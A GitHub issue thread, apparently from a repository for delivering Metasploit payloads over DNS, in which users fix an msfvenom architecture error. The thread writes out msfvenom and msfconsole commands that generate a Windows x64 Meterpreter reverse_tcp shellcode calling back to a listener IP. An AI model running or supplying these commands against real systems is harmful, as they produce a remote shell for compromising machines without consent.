### ISSUE TITLE
Error: The selected arch is incompatible with the payload

### ISSUE THREAD

**Issue by jooeji** [DamonMohammadbagher/NativePayload_DNS#1]
***
root@kali:~# msfvenom --platform windows -arch x86_64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 -f c > /root/Desktop/payload.txt
Error: The selected arch is incompatible with the payload
***

**Comment by DamonMohammadbagher** [comment]
woow Oo change your -arch ==> --arch

**Comment by jooeji** [comment]
root@kali:~# msfvenom --platform windows --arch x86_64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.181 -f c > /root/Desktop/payload.txt
Error: The selected arch is incompatible with the payload
***
i changed my -arch ==> --arch, but it`s also unable

**Comment by DamonMohammadbagher** [comment]
which one payload  you used ? 
windows/x64/meterpreter/reverse_tcp  = --arch x86_64
windows/meterpreter/reverse_tcp  = --arch x86

**Comment by jooeji** [comment]
windows/x64/meterpreter/reverse_tcp = --arch x86_64
***
uesd this

**Comment by DamonMohammadbagher** [comment]
check this method maybe works 4 u
step1 : msfconsole
step2 : msf > use payload/windows/x64/meterpreter/reverse_tcp
step3 :  set lhost  192.168.1.118
step4 : generate
finally you can use  stage1 :

**Comment by persianmystery** [comment]
I have the same problem and using use has worked for me so far. How do you save the results though? I tried using spool or piping it with generate but doesn't work for me.

**Comment by Se5sion** [comment]
> windows/x64/meterpreter/reverse_tcp = --arch x86_64
> 
> uesd 这个

useful
